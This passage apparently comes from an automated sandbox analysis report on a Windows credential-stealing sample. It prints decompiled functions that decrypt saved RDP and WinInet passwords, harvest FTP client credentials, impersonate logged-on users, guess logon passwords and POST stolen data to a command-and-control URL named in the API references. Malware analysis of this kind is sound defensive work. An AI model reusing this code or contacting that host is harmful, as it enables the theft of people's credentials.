								if(__eflags != 0) {
									E0040CC8E(__eflags, _a4, _v24, _v32, _v44, _v48);
									LocalFree(_v44);
								}
							}
						}
						goto L22;
					}
					return _t40;
				} else {
					return __eax;
				}
			}

APIs

lstrlenA.KERNEL32(00000000), ref: 0040CF47
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 0040CFAD
LocalFree.KERNEL32(00000000), ref: 0040CFD4

Strings

username:s:, xrefs: 0040CEF3
full address:s:, xrefs: 0040CF19
password 51:b:, xrefs: 0040CF06

Memory Dump Source

Source File: 0000000C.00000002.696443700.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CryptDataFreeLocalUnprotectlstrlen
String ID: full address:s:$password 51:b:$username:s:
API String ID: 2920030623-2945746679
Opcode ID: 3fe55126ee548df5cd7947a5c5ab92820d57a4bc6a1a7a61529fff14c4b352be
Instruction ID: 60ed0193d19ee7ec15275bf9add7d535b63f43271d864edcc8c9435468f68b04
Opcode Fuzzy Hash: 3fe55126ee548df5cd7947a5c5ab92820d57a4bc6a1a7a61529fff14c4b352be
Instruction Fuzzy Hash: CB412B7285010AEADF119BE1CD46BEEBB76AB48314F14023BE201711E0D6B94A92DB5E

Uniqueness

Uniqueness Score: -1.00%

Function 0040A5BD, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88stringencryptionCOMMON

Download Yara Rule

APIs

CredEnumerateA.ADVAPI32(Microsoft_WinInet_*,00000000,00000000,00000000), ref: 0040A62F
lstrlenW.KERNEL32(00415B17,?,?,00000000), ref: 0040A66D
CryptUnprotectData.CRYPT32(00000000,00000000,?,00000000,00000000,00000001,?), ref: 0040A69D
LocalFree.KERNEL32(00000000), ref: 0040A6CF
CredFree.ADVAPI32(00000000), ref: 0040A6ED

Strings

Microsoft_WinInet_*, xrefs: 0040A62A

Memory Dump Source

Source File: 0000000C.00000002.696443700.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CredFree$CryptDataEnumerateLocalUnprotectlstrlen
String ID: Microsoft_WinInet_*
API String ID: 3891647360-439986189
Opcode ID: 576424615bffc08a157af85e91cbfbecc0d476d7a66ca4336e9b72815a3144d6
Instruction ID: 303936e2a8a44d611f5ab066420c5948f3d508f4a04a3d0421c5e20b59dd798b
Opcode Fuzzy Hash: 576424615bffc08a157af85e91cbfbecc0d476d7a66ca4336e9b72815a3144d6
Instruction Fuzzy Hash: 38312972900209EBDF219F84DC0ABEEB7B4EB44305F184436E550B62D0D7B95AD4DBAA

Uniqueness

Uniqueness Score: -1.00%

Function 00402D57, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 67
registryCOMMON

Download Yara Rule

C-Code - Quality: 57%

			E00402D57(void* __ebx) {
				int _t25;
				void* _t33;
				void* _t36;
				void* _t45;
				void* _t49;
				int _t51;
				void* _t52;

				_t49 = __ebx;
				while(1) {
					L15:
					while(1) {
						L17:
						_t25 = Process32Next( *(_t52 - 0x138), _t52 - 0x134);
						L1:
						if(_t25 != 0) {
							L2:
							if(StrStrIA(_t52 - 0x110, "explorer.exe") == 0) {
								L17:
								_t25 = Process32Next( *(_t52 - 0x138), _t52 - 0x134);
								goto L1;
							} else {
								L3:
								 *(_t52 - 0x13c) = 0;
								_t33 =  *0x4143d5( *(_t52 - 0x12c), _t52 - 0x13c);
								_t51 =  *(_t52 - 0x13c);
								if(_t33 == 0 || _t51 !=  *((intOrPtr*)(_t52 - 0xc))) {
									continue;
								} else {
									L5:
									_t36 = OpenProcess(0x2000000, 0,  *(_t52 - 0x12c));
									if(_t36 == 0) {
										continue;
									} else {
										L6:
										 *(_t52 - 8) = _t36;
										_push(_t52 - 4);
										_push(0x201eb);
										_push( *(_t52 - 8));
										if( *0x41440d() == 0) {
											CloseHandle( *(_t52 - 8));
											continue;
											do {
												do {
													do {
														goto L17;
													} while (StrStrIA(_t52 - 0x110, "explorer.exe") == 0);
													goto L3;
												} while (_t33 == 0 || _t51 !=  *((intOrPtr*)(_t52 - 0xc)));
												goto L5;
											} while (_t36 == 0);
											goto L6;
										} else {
											_push( *(_t52 - 4));
											if( *0x414411() == 0) {
												CloseHandle( *(_t52 - 4));
												CloseHandle( *(_t52 - 8));
												goto L15;
											} else {
												_t49 = _t49 + 1;
												 *(_t52 - 0x140) = 0;
												_t45 = _t52 - 0x140;
												_push(_t45);
												_push(0xf003f);
												L00410E12();
												if(_t45 == 0 &&  *(_t52 - 0x140) != 0) {
													 *0x4140fe =  *(_t52 - 0x140);
												}
												if( *((intOrPtr*)(_t52 + 8)) != 0) {
													 *__eax =  *(_t52 - 4);
												}
											}
										}
									}
								}
							}
						}
						CloseHandle( *(_t52 - 0x138));
						return _t49;
					}
				}
			}

APIs

StrStrIA.SHLWAPI(?,explorer.exe,?,00000128,00000002,00000000), ref: 00402C93
OpenProcess.KERNEL32(02000000,00000000,?), ref: 00402CE1
RegOpenCurrentUser.ADVAPI32(000F003F,00000000), ref: 00402D2B
CloseHandle.KERNEL32(00410C2C), ref: 00402D5C
CloseHandle.KERNEL32(00410B93,00410C2C), ref: 00402D64
CloseHandle.KERNEL32(00410B93), ref: 00402D6E
Process32Next.KERNEL32 ref: 00402D80
CloseHandle.KERNEL32(?,?,00000128,00000002,00000000), ref: 00402D90

Strings

explorer.exe, xrefs: 00402C87

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseHandle$Open$CurrentNextProcessProcess32User
String ID: explorer.exe
API String ID: 2771112661-3187896405
Opcode ID: aef6317e5045ecaeae95ce1e29d41b5616d0a15dd4b1757b2ee98fb37c85f866
Instruction ID: b299d969079444cf023299e81dd2094d9188d3462d9269bcd78f4557cfd88060
Opcode Fuzzy Hash: aef6317e5045ecaeae95ce1e29d41b5616d0a15dd4b1757b2ee98fb37c85f866
Instruction Fuzzy Hash: C7213A72A00518EBDF229B61DD4ABED7A74AF04304F1440B6A104B51E1E7BC9E91DF59

Uniqueness

Uniqueness Score: -1.00%

Function 0040912E, Relevance: 36.2, APIs: 16, Strings: 8, Instructions: 238
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0040912E(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v20;
				int _v24;
				int _v28;
				int* _v32;
				int* _v36;
				int* _v40;
				int* _v44;
				int* _v48;
				CHAR* _v52;
				CHAR* _v56;
				CHAR* _v60;
				CHAR* _v64;
				char* _v68;
				int _v72;
				int _v76;
				int _v80;
				void* _t85;
				int _t87;
				int _t90;
				int _t94;
				int _t101;
				int _t108;
				int _t110;
				int _t115;
				int _t133;
				int _t136;
				int _t138;
				void* _t140;
				int _t141;
				int* _t143;

				_t85 = E00401E53(_a8);
				if(_t85 != 0) {
					_t87 = E00403F1F(_a8);
					__eflags = _t87;
					if(_t87 == 0) {
						E00408EC5(_a12, _a16);
						_t90 = E00401F1B(__eflags, _a8,  &_v20);
						__eflags = _t90;
						if(_t90 != 0) {
							_t94 = E00402515(_v12, _v8);
							__eflags = _t94;
							if(_t94 != 0) {
								_v24 = _t94;
								_t143 = _t94;
								__eflags =  *_t143;
								if(__eflags != 0) {
									_v52 = E004090F2(__eflags, _t143);
									_push(lstrcmpA("#2c", _v52));
									_push(lstrcmpA("#2d", _v52));
									_t101 = lstrcmpA("#2e", _v52);
									_pop(_t141);
									_pop(_t138);
									__eflags = _t101;
									if(_t101 == 0) {
										L10:
										__eflags = _t138;
										if(_t138 != 0) {
											_v80 = 0;
										} else {
											_v80 = 1;
										}
										asm("cld");
										_t140 = 0xffffffff;
										asm("repne scasb");
										__eflags =  *_t143;
										if ( *_t143 != 0) goto L14;
										_v28 = 0;
										while(1) {
											__eflags =  *_t143;
											if(__eflags == 0) {
												goto L54;
											}
											_v56 = E004090F2(__eflags, _t143);
											__eflags = _v28;
											if(_v28 != 0) {
												__eflags = _v28 - 1;
												if(_v28 != 1) {
													__eflags = _v28 - 2;
													if(_v28 != 2) {
														__eflags = _v28 - 3;
														if(_v28 != 3) {
															__eflags = _v28 - 4;
															if(_v28 != 4) {
																__eflags = _v28 - 5;
																if(_v28 != 5) {
																	__eflags = _v28 - 6;
																	if(_v28 == 6) {
																		_v28 = 2;
																	}
																} else {
																	_v48 = _t143;
																	__eflags = _v80;
																	if(__eflags == 0) {
																		_v28 = 6;
																	} else {
																		_v28 = 2;
																	}
																	_v68 = 0;
																	_v60 = 0;
																	_v64 = 0;
																	_v72 = 0;
																	_v76 = 0;
																	_v68 = E004090F2(__eflags, _v32);
																	_v60 = E004090F2(__eflags, _v40);
																	_v64 = E004090F2(__eflags, _v48);
																	__eflags =  *0x415824;
																	if( *0x415824 != 0) {
																		__eflags =  *0x415824 - 1;
																		if( *0x415824 != 1) {
																			_t115 = 0;
																			__eflags = 0;
																		} else {
																			_t115 = StrCmpNIA(_v68, "ftp.", lstrlenA("ftp."));
																		}
																	} else {
																		_t133 = StrCmpNIA(_v68, "ftp://", lstrlenA("ftp://"));
																		__eflags = _t133;
																		if(_t133 != 0) {
																			_t133 = StrCmpNIA(_v68, "http://", lstrlenA("http://"));
																		}
																		_t115 = _t133;
																		__eflags = _t115;
																		if(_t115 != 0) {
																			_t115 = StrCmpNIA(_v68, "https://", lstrlenA("https://"));
																		}
																	}
																	__eflags = _t115;
																	if(_t115 == 0) {
																		_v72 = E00408FA6(_t140, _v60, lstrlenA(_v60));
																		_v76 = E00408FA6(_t140, _v64, lstrlenA(_v64));
																		__eflags = _v68;
																		if(_v68 != 0) {
																			__eflags = _v76;
																			if(_v76 != 0) {
																				E00401486(_a4, 0xbeef0000);
																				E004014E8(_a4, _v68);
																				E004014E8(_a4, _v72);
																				E004014E8(_a4, _v76);
																			}
																		}
																	}
																	E004017D5(_v68);
																	E004017D5(_v60);
																	E004017D5(_v64);
																	E004017D5(_v72);
																	E004017D5(_v76);
																}
															} else {
																_v44 = _t143;
																_v28 = 5;
															}
														} else {
															_v40 = _t143;
															_v28 = 4;
														}
													} else {
														_v36 = _t143;
														_v28 = 3;
													}
												} else {
													_v32 = _t143;
													_v28 = 2;
												}
												__eflags = _v28;
												if(_v28 != 0) {
													_t108 = lstrcmpA(_v56, 0x414806);
													__eflags = _t108;
													if(_t108 == 0) {
														_v28 = 1;
													}
													_t110 = lstrcmpA(_v56, "---");
													__eflags = _t110;
													if(_t110 == 0) {
														_v28 = 2;
													}
												}
											} else {
												_t136 = lstrcmpA(_v56, 0x414806);
												__eflags = _t136;
												if(_t136 == 0) {
													_v28 = 1;
												}
											}
											E004017D5(_v56);
											asm("cld");
											_t140 = 0xffffffff;
											asm("repne scasb");
											__eflags =  *_t143;
											if( *_t143 != 0) {
												continue;
											}
											goto L54;
										}
									} else {
										__eflags = _t141;
										if(_t141 == 0) {
											goto L10;
										} else {
											_t138 = _t138;
											__eflags = _t138;
											if(_t138 == 0) {
												goto L10;
											}
										}
									}
									L54:
									E004017D5(_v52);
								}
								E004017D5(_v24);
							}
							E00401FB0( &_v20);
						}
						return E00408F7D();
					} else {
						return _t87;
					}
				} else {
					return _t85;
				}
			}

Strings

ftp://, xrefs: 004092FD, 00409308
http://, xrefs: 00409319, 00409324
#2d, xrefs: 004091B1
https://, xrefs: 00409335, 00409340
---, xrefs: 0040942F
#2e, xrefs: 004091BF
ftp., xrefs: 00409358, 00409363
#2c, xrefs: 004091A3

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: #2c$#2d$#2e$---$ftp.$ftp://$http://$https://
API String ID: 0-1526611526
Opcode ID: 44378f815597745bbc4f01509e57f7de6c1b5a1070497c7f43b3eeb3b84ec0c5
Instruction ID: 96101fffbdba439034eac4df85c0c476d3f464cc9ab40425e2c0fc1f81b8675a
Opcode Fuzzy Hash: 44378f815597745bbc4f01509e57f7de6c1b5a1070497c7f43b3eeb3b84ec0c5
Instruction Fuzzy Hash: C391597190420AEADF21AFA1DD46BEEBAB1AF54308F24403BF011B11E2D7BD0D91DB59

Uniqueness

Uniqueness Score: -1.00%

Function 00402C05, Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 105
registryprocessCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E00402C05(void* __eax, void* __edx, intOrPtr _a4) {
				void* _v8;
				void* _v12;
				intOrPtr _v16;
				char _v276;
				long _v304;
				void* _v312;
				void* _v316;
				int _v320;
				int _v324;
				void* _t33;
				int _t36;
				void* _t44;
				void* _t47;
				int* _t56;
				void* _t60;
				int _t64;

				if( *0x4143d1 == 0 ||  *0x4143d5 == 0 ||  *0x41440d == 0 ||  *0x414411 == 0) {
					return 0;
				} else {
					_t60 = 0;
					_v16 =  *0x4143d1();
					_v312 = 0x128;
					_t33 = CreateToolhelp32Snapshot(2, 0);
					if(_t33 != 0xffffffff) {
						_v316 = _t33;
						_t36 = Process32First(_v316,  &_v312);
						while(_t36 != 0) {
							if(StrStrIA( &_v276, "explorer.exe") == 0) {
								L23:
								_t36 = Process32Next(_v316,  &_v312);
								continue;
							} else {
								_v320 = 0;
								_t44 =  *0x4143d5(_v304,  &_v320);
								_t64 = _v320;
								if(_t44 == 0 || _t64 != _v16) {
									goto L23;
								} else {
									_t47 = OpenProcess(0x2000000, 0, _v304);
									if(_t47 == 0) {
										goto L23;
									} else {
										_v12 = _t47;
										if(OpenProcessToken(_v12, 0x201eb,  &_v8) == 0) {
											CloseHandle(_v12);
											goto L23;
										} else {
											if(ImpersonateLoggedOnUser(_v8) == 0) {
												CloseHandle(_v8);
												CloseHandle(_v12);
												goto L23;
											} else {
												_t60 = _t60 + 1;
												_v324 = 0;
												_t56 =  &_v324;
												_push(_t56);
												_push(0xf003f);
												L00410E12();
												if(_t56 == 0 && _v324 != 0) {
													_push(_v324);
													_pop( *0x4140fe);
												}
												if(_a4 != 0) {
													_push(_v8);
													_pop( *__eax);
												}
											}
										}
									}
								}
							}
							break;
						}
						CloseHandle(_v316);
					}
					return _t60;
				}
			}

APIs

WTSGetActiveConsoleSessionId.KERNEL32(?,?,00410B93,00410C2C), ref: 00402C42
CreateToolhelp32Snapshot.KERNEL32 ref: 00402C59
Process32First.KERNEL32 ref: 00402C7A
StrStrIA.SHLWAPI(?,explorer.exe,?,00000128,00000002,00000000), ref: 00402C93
ProcessIdToSessionId.KERNEL32(?,00000000,?,explorer.exe,?,00000128,?,explorer.exe,?,00000128,00000002,00000000), ref: 00402CB7
OpenProcess.KERNEL32(02000000,00000000,?), ref: 00402CE1
OpenProcessToken.ADVAPI32(00410B93,000201EB,00410C2C,02000000,00000000,?), ref: 00402CFD
ImpersonateLoggedOnUser.ADVAPI32(00410C2C), ref: 00402D0A
RegOpenCurrentUser.ADVAPI32(000F003F,00000000), ref: 00402D2B
CloseHandle.KERNEL32(?,?,00000128,00000002,00000000), ref: 00402D90

Strings

explorer.exe, xrefs: 00402C87

Memory Dump Source

Source File: 0000000C.00000002.696443700.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: OpenProcess$SessionUser$ActiveCloseConsoleCreateCurrentFirstHandleImpersonateLoggedProcess32SnapshotTokenToolhelp32
String ID: explorer.exe
API String ID: 4004126742-3187896405
Opcode ID: d7b33712bffa344649a6c7b91db19c6665e4b5ef021c38cbfc5ccfe492207028
Instruction ID: ccbd0d7988a87a0baa37139996db17261bf584517116b24148bb5ef45f8ddf5c
Opcode Fuzzy Hash: d7b33712bffa344649a6c7b91db19c6665e4b5ef021c38cbfc5ccfe492207028
Instruction Fuzzy Hash: 15418B72900218ABDF219F61DD4ABDE7AB5AF04304F0085B6A104B51E1EBFC9ED1DE58

Uniqueness

Uniqueness Score: -1.00%

Function 0041098D, Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 135
stringCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E0041098D(signed int __eax, void* __ecx, signed int __edx) {
				void* _v8;
				CHAR* _v12;
				char _v16;
				CHAR* _v20;
				CHAR* _v24;
				CHAR* _v28;
				void* _v32;
				void* _v36;
				char _v40;
				char _v44;
				char _v48;
				char _t46;
				char _t50;
				char _t54;
				char _t57;
				char _t59;
				char _t65;
				int _t68;
				char _t69;
				char _t70;
				void* _t71;
				signed int _t73;
				signed int _t74;
				CHAR* _t75;

				_t71 = __ecx;
				_t73 = __edx ^ __eax;
				_t42 = __eax ^ _t73;
				_t74 = _t73 ^ __eax ^ _t73;
				if( *0x414411 == 0 ||  *0x41441d == 0) {
					return 0;
				} else {
					_t69 =  *0x417691; // 0x6cd078
					while(1) {
						_t70 = _t69;
						__eflags = _t70;
						if(_t70 == 0) {
							break;
						}
						E00402AF8(_t42, _t74);
						__eflags =  *0x417695;
						if( *0x417695 == 0) {
							L7:
							_v8 = 0;
							_t46 = LogonUserA( *(_t70 + 4), 0,  *(_t70 + 4), 2, 0,  &_v8);
							__eflags = _t46;
							if(_t46 == 0) {
								_v12 = E0040294B( *(_t70 + 4));
								_t50 = LCMapStringA(0x400, 0x100,  *(_t70 + 4), lstrlenA( *(_t70 + 4)), _v12, _t49);
								__eflags = _t50;
								if(_t50 == 0) {
									L12:
									E004017D5(_v12);
									_t75 = "samantha";
									L13:
									_v8 = 0;
									_t54 = LogonUserA( *(_t70 + 4), 0, _t75, 2, 0,  &_v8);
									__eflags = _t54;
									if(_t54 != 0) {
										goto L14;
									}
								} else {
									_v8 = 0;
									_t65 = LogonUserA( *(_t70 + 4), 0, _v12, 2, 0,  &_v8);
									__eflags = _t65;
									if(_t65 == 0) {
										goto L12;
									} else {
										E004017D5(_v12);
										goto L14;
									}
								}
							} else {
								L14:
								_v44 = 0x20;
								_v40 = 1;
								 *_t23 =  *(_t70 + 4);
								 *_t25 =  *((intOrPtr*)(_t70 + 8));
								_v28 = 0;
								_v24 = 0;
								_v20 = 0;
								_v16 = 0;
								_t57 =  &_v44;
								_push(_t57);
								_push(_v8);
								L00410E96();
								__eflags = _t57;
								if(_t57 == 0) {
									_v48 = 0;
								} else {
									__eflags = _v16;
									if(_v16 != 0) {
										_push(_v16);
										_pop( *0x4140fe);
									}
									_v48 = 1;
								}
								_t59 = ImpersonateLoggedOnUser(_v8);
								_t60 = _t59;
								__eflags = _t59;
								if(__eflags != 0) {
									E004105CE(_t60, _t71, _t74, __eflags);
									__eflags =  *0x414409;
									if( *0x414409 != 0) {
										RevertToSelf();
									}
									 *0x4140fe = 0x80000001;
								}
								__eflags = _v48;
								if(_v48 != 0) {
									_push(_v16);
									_push(_v8);
									L00410E9C();
								}
								CloseHandle(_v8);
							}
							asm("cld");
							_t42 = 0;
							_t71 = 0xffffffff;
							asm("repne scasb");
							__eflags =  *_t75;
							if( *_t75 != 0) {
								goto L13;
							}
						} else {
							_t68 = lstrcmpiA( *0x417695,  *(_t70 + 4));
							_t42 = _t68;
							__eflags = _t68;
							if(_t68 != 0) {
								goto L7;
							} else {
							}
						}
						_t69 =  *_t70;
					}
					return 1;
				}
			}

APIs

lstrcmpiA.KERNEL32(?), ref: 004109D5
LogonUserA.ADVAPI32(?,00000000,?,00000002,00000000,00000000), ref: 004109FA
lstrlenA.KERNEL32(?,?), ref: 00410A17
LCMapStringA.KERNEL32(00000400,00000100,?,00000000,?,00000000,?,?), ref: 00410A2E
LogonUserA.ADVAPI32(?,00000000,?,00000002,00000000,00000000), ref: 00410A4E
LoadUserProfileA.USERENV(00000000,00000020,?,?), ref: 00410ACF
ImpersonateLoggedOnUser.ADVAPI32(00000000,00000000,00000020,?,?), ref: 00410AFA
RevertToSelf.ADVAPI32 ref: 00410B12
UnloadUserProfile.USERENV(00000000,00000000), ref: 00410B2E
CloseHandle.KERNEL32(00000000), ref: 00410B36

Strings

, xrefs: 00410A92
samantha, xrefs: 00410A6A, 00410A7E

Memory Dump Source

Source File: 0000000C.00000002.696443700.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: User$LogonProfile$CloseHandleImpersonateLoadLoggedRevertSelfStringUnloadlstrcmpilstrlen
String ID: $samantha
API String ID: 1348396137-1937562511
Opcode ID: e8c680e9c729fbd071ccc07f1bc87b888f040c63c80d600780040c0011251876
Instruction ID: 97e36a9f464fd7594aaf26f4fe361f5543e1ef418d0b81fc890e2415056c999a
Opcode Fuzzy Hash: e8c680e9c729fbd071ccc07f1bc87b888f040c63c80d600780040c0011251876
Instruction Fuzzy Hash: 54516E71A00208EFEF119FA1DD46BDEBA75EB04318F14C066E510A91E2D7F99AD0DF29

Uniqueness

Uniqueness Score: -1.00%

Function 0040A88E, Relevance: 21.2, APIs: 7, Strings: 7, Instructions: 178
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040A88E(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				CHAR* _v8;
				CHAR* _v12;
				CHAR* _v16;
				CHAR* _v20;
				CHAR* _v24;
				CHAR* _v28;
				CHAR* _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr* _v56;
				char _v60;
				char _v64;
				char _v68;

				_v8 = E004017EC(0x2000);
				_v12 = E004017EC(0x2000);
				_v16 = E004017EC(0x2000);
				_v20 = E004017EC(0x2000);
				_v24 = E004017EC(0x2000);
				_v28 = E004017EC(0x2000);
				_v32 = E004017EC(0x2000);
				wsprintfA(_v8, "SiteServer %d\\Host", _a12);
				wsprintfA(_v12, "SiteServer %d\\WebUrl", _a12);
				wsprintfA(_v16, "SiteServer %d\\Remote Directory", _a12);
				wsprintfA(_v20, "SiteServer %d-User", _a12);
				wsprintfA(_v24, "SiteServer %d-User PW", _a12);
				wsprintfA(_v28, "%s\\Keychain", _a8);
				wsprintfA(_v32, "SiteServer %d\\SFTP", _a12);
				_v36 = E00401C8E( *0x4140fe, _a8, _v8, 0);
				_v40 = E00401C8E( *0x4140fe, _a8, _v12, 0);
				_v44 = E00401C8E( *0x4140fe, _a8, _v16, 0);
				_v48 = E00401C8E( *0x4140fe, _v28, _v20, 0);
				_v52 = E00401C8E( *0x4140fe, _v28, _v24, 0);
				_v56 = E00401C8E( *0x4140fe, _a8, _v32,  &_v68);
				if(_v36 != 0 && _v48 != 0 && _v52 != 0 && E0040A774(_v48,  &_v64) != 0 && _v64 != 0 && E0040A774(_v52,  &_v60) != 0 && _v60 != 0) {
					E00401486(_a4, 0xbeef0010);
					E004014E8(_a4, _v36);
					E004014E8(_a4, _v40);
					E004014E8(_a4, _v44);
					E004014BC(_a4, _v48, _v64);
					E004014BC(_a4, _v52, _v60);
					if(_v56 == 0 || _v68 != 4) {
						E00401486(_a4, 0);
					} else {
						E00401486(_a4,  *_v56);
					}
				}
				E004017D5(_v8);
				E004017D5(_v12);
				E004017D5(_v16);
				E004017D5(_v20);
				E004017D5(_v24);
				E004017D5(_v28);
				E004017D5(_v32);
				E004017D5(_v36);
				E004017D5(_v40);
				E004017D5(_v44);
				E004017D5(_v48);
				E004017D5(_v52);
				return E004017D5(_v56);
			}

APIs

Part of subcall function 004017EC: LocalAlloc.KERNEL32(00000040,-00000080,?,00402BA6,00000000), ref: 004017FA

wsprintfA.USER32 ref: 0040A8FA
wsprintfA.USER32 ref: 0040A90D
wsprintfA.USER32 ref: 0040A920
wsprintfA.USER32 ref: 0040A933
wsprintfA.USER32 ref: 0040A946
wsprintfA.USER32 ref: 0040A959
wsprintfA.USER32 ref: 0040A96C

Part of subcall function 0040A774: lstrlenA.KERNEL32(?), ref: 0040A789

Part of subcall function 0040A774: LocalFree.KERNEL32(00000000), ref: 0040A874

Part of subcall function 004014E8: lstrlenA.KERNEL32(00000000), ref: 004014F4

Strings

SiteServer %d\Host, xrefs: 0040A8F2
SiteServer %d\WebUrl, xrefs: 0040A905
SiteServer %d-User PW, xrefs: 0040A93E
SiteServer %d-User, xrefs: 0040A92B
SiteServer %d\SFTP, xrefs: 0040A964
%s\Keychain, xrefs: 0040A951
SiteServer %d\Remote Directory, xrefs: 0040A918

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: wsprintf$Locallstrlen$AllocFree
String ID: %s\Keychain$SiteServer %d-User$SiteServer %d-User PW$SiteServer %d\Host$SiteServer %d\Remote Directory$SiteServer %d\SFTP$SiteServer %d\WebUrl
API String ID: 2275035253-1012938452
Opcode ID: 297afe6489245746d90da32aa81436c0f57db6a18f2daa773280244a879e5037
Instruction ID: 9451ae28163268872172244b5ac3737368aa19c67849d8b2cc615b1fa428e2da
Opcode Fuzzy Hash: 297afe6489245746d90da32aa81436c0f57db6a18f2daa773280244a879e5037
Instruction Fuzzy Hash: B661A635940209FBDF126FE2DD46AEDBA72AF04314F14803AF510351F2E77A4964EB59

Uniqueness

Uniqueness Score: -1.00%

Function 00403B74, Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 156
networkstringCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00403B74(void* __edx, void* __eflags, char* _a4, intOrPtr _a8, int _a12, intOrPtr _a16) {
				long _v16;
				void* _v20;
				signed int _v40;
				long _v44;
				int _v48;
				void* _v64;
				intOrPtr _v68;
				CHAR* _v72;
				char* _v76;
				int _v80;
				long _v84;
				long _v88;
				intOrPtr _v92;
				char _v96;
				int _t83;
				int _t89;
				int _t91;
				int _t95;
				int _t99;
				int _t104;
				void* _t110;

				_t110 = __edx;
				_v88 = 0;
				_t104 = 0;
				_v68 = E004017EC(0x1000);
				_v76 = E004017EC(0x1000);
				_v72 = E004017EC(0x1000);
				_v92 = E004017EC(0x1000);
				_v96 = 0x1000;
				memset( &_v64, 0, 0x3c << 0);
				_v64 = 0x3c;
				_push(_v68);
				_pop( *_t11);
				_push(_v76);
				_pop( *_t13);
				_v44 = 0xfff;
				_v16 = 0xfff;
				if(InternetCrackUrlA(_a4, 0, 0x80000000,  &_v64) == 0 || _v48 == 0) {
				} else {
					_v84 = 0xfff;
					_t83 = InternetCreateUrlA( &_v64, 0x80000000, _v72,  &_v84);
					__eflags = _t83;
					if(_t83 != 0) {
						 *_v76 = 0;
						memset( &_v64, 0, 0x3c << 0);
						_v64 = 0x3c;
						_push(_v76);
						_pop( *_t28);
						_v44 = 0xfff;
						_v16 = 0xfff;
						_t89 = InternetCrackUrlA(_v72, 0, 0,  &_v64);
						__eflags = _t89;
						if(_t89 == 0) {
							L7:
							L21:
							E004017D5(_v68);
							E004017D5(_v72);
							E004017D5(_v76);
							E004017D5(_v92);
							if(_v88 != 0) {
								E004017D5(_v88);
							}
							return _t104;
						}
						__eflags = _v48;
						if(_v48 != 0) {
							_t91 =  &_v96;
							_push(_t91);
							_push(_v92);
							_push(0);
							L00410E54();
							__eflags = _t91;
							if(_t91 < 0) {
								wsprintfA(_v72, "POST %s HTTP/1.0\r\nHost: %s\r\nAccept: */*\r\nAccept-Encoding: identity, *;q=0\r\nAccept-Language: en-US\r\nContent-Length: %lu\r\nContent-Type: application/octet-stream\r\nConnection: close\r\nContent-Encoding: binary\r\nUser-Agent: %s\r\n\r\n", _v76, _v68, _a12, "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/5.0)");
							} else {
								wsprintfA(_v72, "POST %s HTTP/1.0\r\nHost: %s\r\nAccept: */*\r\nAccept-Encoding: identity, *;q=0\r\nAccept-Language: en-US\r\nContent-Length: %lu\r\nContent-Type: application/octet-stream\r\nConnection: close\r\nContent-Encoding: binary\r\nUser-Agent: %s\r\n\r\n", _v76, _v68, _a12, _v92);
							}
							_t95 = E00403749(_v40 & 0x0000ffff, 0, _v68, 0, _v40 & 0x0000ffff);
							__eflags = _t95;
							if(_t95 != 0) {
								_v80 = _t95;
								E00403B46(_v80);
								_t99 = E004037CD(_v80, _v72, lstrlenA(_v72));
								__eflags = _t99;
								if(_t99 != 0) {
									__eflags = _a12;
									if(_a12 == 0) {
										L18:
										_t104 = _t99;
										__eflags = _t104;
										if(__eflags != 0) {
											_t104 = E004039C1(_t110, __eflags, _v80, _a16,  &_v88);
										}
										L20:
										_push(_v80);
										L00410E72();
										goto L21;
									}
									_t99 = E004037CD(_v80, _a8, _a12);
									__eflags = _t99;
									if(_t99 != 0) {
										goto L18;
									}
									goto L20;
								}
								goto L20;
							} else {
								goto L21;
							}
						}
						goto L7;
					}
				}
			}

APIs

Part of subcall function 004017EC: LocalAlloc.KERNEL32(00000040,-00000080,?,00402BA6,00000000), ref: 004017FA

InternetCrackUrlA.WININET(?,00000000,80000000,0000003C), ref: 00403BFB
InternetCreateUrlA.WININET(0000003C,80000000,?,00000FFF), ref: 00403C26
InternetCrackUrlA.WININET(?,00000000,00000000,0000003C), ref: 00403C6C
ObtainUserAgentString.URLMON(00000000,?,00001000), ref: 00403C89
wsprintfA.USER32 ref: 00403CA6
wsprintfA.USER32 ref: 00403CC6

Part of subcall function 00403B46: setsockopt.WSOCK32(00000000,0000FFFF,00000080,00000001,00000004), ref: 00403B6B

lstrlenA.KERNEL32(?,?,?,00000000,?,00001000,00001000,00001000,00001000,?,http://n3systems.com.br/layouts/libraries/.trash/cphorde/rem.php), ref: 00403CF1
closesocket.WSOCK32(?,?,?,00000000,?,?,?,00000000,?,00001000,00001000,00001000,00001000,?,http://n3systems.com.br/layouts/libraries/.trash/cphorde/rem.php), ref: 00403D3C

Strings

<, xrefs: 00403C46
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/5.0), xrefs: 00403CB0
